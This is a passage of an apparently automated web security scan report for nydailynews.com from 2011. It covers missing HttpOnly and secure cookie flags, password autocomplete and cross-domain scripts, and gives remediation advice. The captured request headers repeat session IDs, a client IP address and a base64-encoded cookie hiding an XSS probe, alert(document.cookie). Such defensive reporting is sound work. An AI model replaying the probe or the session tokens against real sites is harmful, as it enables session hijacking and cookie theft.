GET /forums/abuse!default.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/communityjs/44?forum=13&key=2748c8d6e1b10496a67bf33d97fa3d8e HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/news/national/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/forum.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/popular-communityjs HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=B19117E5EE60847C109FFADD8A91AA45; Path=/forums Content-Type: text/javascript;charset=ISO-8859-1 Content-Length: 1619 Date: Tue, 08 Feb 2011 18:23:27 GMT Connection: close
document.write('\t<li><a href=\"http://www.nydailynews.com/forums/thread.jspa?threadID=124030\">Bristol Palin to write memoir due out in June, according to Amazon listing -- but what will they say</a> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/thread.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=xAPb30RhH50nMVMVvntz4Q**; Path=/nydn
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/content/protected/userAccount.jsp HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=xAPb30RhH50nMVMVvntz4Q**; Path=/nydn Content-Type: text/html;charset=ISO-8859-1 Date: Tue, 08 Feb 2011 18:28:38 GMT Connection: close Content-Length: 40694
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=AqaNY9-bhh2icgsxCbAiBA**; Path=/nydn
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/emailArticle.do HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=AqaNY9-bhh2icgsxCbAiBA**; Path=/nydn Content-Type: text/html;charset=ISO-8859-1 Content-Length: 3304 Date: Tue, 08 Feb 2011 18:28:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.html HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/dwr/engine.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
/* * Copyright 2005 Joe Walker * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/dwr/interface/mostEmailedStories.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
// Provide a default path to dwr.engine if (dwr == null) var dwr = {}; if (dwr.engine == null) dwr.engine = {}; if (DWREngine == null) var DWREngine = dwr.engine;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/dwr/interface/mostPopularStories.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nydn/dwr/util.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
/*
 * Copyright 2005 Joe Walker
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of th
...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homedelivery/index.php HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:40:28 GMT
Server: Apache
Content-Length: 3711
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: sto-id-sg-http-web05_6=CCACAKAK; Expires=Tue, 08-Feb-2011 19:40:56 GMT; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>The New York Daily News</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="W ...[SNIP]...
5. Password field with autocomplete enabled
Summary
Severity: Low
Confidence: Certain
Host: http://www.nydailynews.com
Path: /nydn/content/protected/userAccount.jsp
Issue detail
The page contains a form with the following action URL:
http://www.nydailynews.com/nydn/login.do
The form contains the following password field with autocomplete enabled:
password
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /nydn/content/protected/userAccount.jsp HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=xAPb30RhH50nMVMVvntz4Q**; Path=/nydn
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 08 Feb 2011 18:28:38 GMT
Connection: close
Content-Length: 40694
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
Request
GET /homedelivery/index.php HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:40:28 GMT
Server: Apache
Content-Length: 3711
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: sto-id-sg-http-web05_6=CCACAKAK; Expires=Tue, 08-Feb-2011 19:40:56 GMT; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>The New York Daily News</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="W ...[SNIP]...
7. Cross-domain script include
There are 34 instances of this issue.
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
Cache-control: no-store
Pragma: no-cache
Request
